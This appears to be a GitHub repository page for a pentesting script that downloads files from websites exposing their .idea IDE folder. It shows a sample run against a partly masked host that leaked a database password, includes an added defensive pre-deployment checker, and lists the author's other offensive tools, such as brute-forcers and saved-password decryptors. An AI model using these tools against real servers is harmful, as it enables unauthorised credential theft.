• Stars
    star
    357
  • Rank 119,149 (Top 3 %)
  • Language
    Python
  • Created over 5 years ago
  • Updated over 2 years ago


Repository Details

Gather sensitive information from (.idea) folder for pentesters

.idea disclosure exploit

A script that uses the .idea folder to gather sensitive information for pentesters.

Incorrectly deployed websites leave their IDE config folder (.idea) exposed to attackers, which can leak passwords or archived data files.

The scanner will try to download all files; please recheck the local files yourself.
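A pre-deployment check for the misconfiguration described above, as an added example that is not part of this repository's code: it walks a release directory and reports IDE and VCS metadata that would be served from the web root. The function names and the sample tree are assumptions constructed for illustration; the metadata names (.idea, .git, .DS_Store) are the ones mentioned on this page.

```python
import os
import sys
import tempfile

# Names taken from this page: .idea (this tool), .git (GitHack), .DS_Store (ds_store_exp).
METADATA_DIRS = {".idea", ".git"}
METADATA_FILES = {".DS_Store"}


def find_exposed_metadata(web_root):
    """Return sorted (relative_path, kind, file_count) tuples for metadata under web_root."""
    findings = []
    for current, dirs, files in os.walk(web_root):
        for name in list(dirs):
            if name in METADATA_DIRS:
                full = os.path.join(current, name)
                count = sum(len(f) for _, _, f in os.walk(full))
                rel = os.path.relpath(full, web_root).replace(os.sep, "/")
                findings.append((rel, "dir", count))
                dirs.remove(name)  # whole folder is flagged, no need to descend
        for name in files:
            if name in METADATA_FILES:
                rel = os.path.relpath(os.path.join(current, name), web_root)
                findings.append((rel.replace(os.sep, "/"), "file", 1))
    return sorted(findings)


def build_sample_tree(root):
    """Constructed sample release tree, used only when no path is given."""
    for rel in ("cfg/DbConnCfg.json", ".idea/workspace.xml", ".idea/modules.xml",
                "static/.DS_Store", "index.php"):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("sample\n")


def main(argv):
    with tempfile.TemporaryDirectory() as sample:
        if len(argv) < 2:
            build_sample_tree(sample)  # no path given: demo on the constructed tree
        findings = find_exposed_metadata(argv[1] if len(argv) > 1 else sample)
    for rel, kind, count in findings:
        print(f"[!] {kind} {rel} ({count} file(s)) must not ship in the web root")
    return 1 if findings else 0  # non-zero exit lets a deploy pipeline stop the release


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it with the release directory as the only argument; a non-zero exit code means metadata was found and the build should not be published as-is.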

Requirements

pip install lxml requests

Change Log

  • 2022-08-05: Bug fix and Python 3 support

Example

Our scanner reported a vulnerability this afternoon.

scanner_pannel

As you can see, the file DbConnCfg.json leaked the database password.

D:\IQIYI.codebase\idea_exp>idea_exp.py http://107.{mask}.{mask}.151/
[+] Module name is {mask}
[+] Type is web_module
[+] About 67 urls to process
[200] /cfg/DbConnCfg.json
[200] /bi/applepay/comm.php
[200] /bi/applepay/ipn_ios.php
[404] /auth/auth_ios/auth_guest.php
...
[200] /ver/ver_util.php
All files saved to 107.{mask}.{mask}.151/idea_exp_report.html

contain_password

More Repositories

1

subDomainsBrute

A fast sub domain brute tool for pentesters
Python
3,444
star
2

GitHack

A `.git` folder disclosure exploit
Python
3,050
star
3

BBScan

A fast vulnerability scanner helps pentesters pinpoint possibly vulnerable targets from a large number of web servers
Python
2,166
star
4

ds_store_exp

A .DS_Store file disclosure exploit. It parses .DS_Store file and downloads files recursively.
Python
1,495
star
5

swagger-exp

A Swagger API Exploit
JavaScript
1,136
star
6

htpwdScan

HTTP weak pass scanner
Python
900
star
7

EasyPen

EasyPen is a GUI program which helps pentesters do target discovery, vulnerability scan and exploitation
JavaScript
606
star
8

IIS_shortname_Scanner

an IIS shortname Scanner
Python
522
star
9

eyes.sh

Optimized DNS/HTTP Log Tool for pentesters, faster and easy to use.
HTML
378
star
10

MisConfig_HTTP_Proxy_Scanner

The scanner helps to scan misconfigured reverse proxy servers and misconfigured forward proxy servers
Python
170
star
11

edu-dns-zone-transfer

script to scan edu.cn DNS Servers
Python
89
star
12

log4j2_vul_local_scanner

Log4j vulnerability local detection script. Scans all Java processes on your host to check whether it is affected by the log4j2 remote code execution vulnerability (CVE-2021-45046)
Python
85
star
13

struts2_045_scan

Struts2-045 Scanner
Python
73
star
14

OutLook_WebAPP_Brute

Microsoft Outlook WebAPP Brute
Python
64
star
15

WIFIpass

decrypt all saved WIFI passwords on your PC
Python
61
star
16

chromePass

Decrypt all saved Chrome passwords
Python
41
star
17

NPUcat

NPUcat one click proxy
Python
9
star
18

DNS_AXFR_Client

A python DNS Transfer Client
Python
8
star
19

lijiejie

1
star